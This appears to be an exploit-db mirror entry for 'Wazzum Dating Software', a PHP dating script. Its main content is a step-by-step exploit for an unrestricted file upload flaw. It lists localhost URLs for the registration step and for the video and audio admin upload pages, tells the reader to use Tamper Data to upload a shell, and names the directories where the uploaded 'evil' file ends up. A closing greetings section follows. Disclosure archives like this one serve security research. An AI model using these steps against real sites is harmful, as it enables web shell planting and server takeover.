exploit-db-mirror/exploits/php/webapps/11954.txt

========================================================================================
| ( Title    ) Wazzum Dating Software Mullti Vulnerability
| ( Author   ) El-Kahina
| ( email    ) please forgive me                                                                                                                            |
| ( Web Site ) wwww.iqs3cur1ty.com
| ( Script   ) http://hotfile.com/dl/32756801/c6b4b5e/Wazzum.zip.html
| ( Tested on) Lunix Français v.(9.10 Ubuntu)
| ( Bug      ) Upload
|
======================      Exploit By EL-Kahina       =================================
 # Exploit  :

 1 - Register - Step 1

 http://127.0.0.1/Wazzum/register.php?step=1&case=reg&PHPSESSID=fba9845f1d798c1bf4faf996e7789b4c

 2 - Register - Step 2

 http://127.0.0.1/Wazzum/register.php?step=2&mode=create&case=reg (You Can Use Shell to Upload)

 3 - http://127.0.0.1/Wazzum//video_admin.php?type=v (2 upload video) Use Tamper Data

 http://127.0.0.1/Wazzum//includes/videos/ to find evil

 http://127.0.0.1/Wazzum//audio_admin.php?type=a (2 upload audio) Use Tamper Data

 http://127.0.0.1/Wazzum//includes/audios/ to find evil

==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
(Dz-Ghost Team ) im indoushka's sister -#[V!va Fidal Castro]#-
--------------------------------------------------------------------------------------------------------------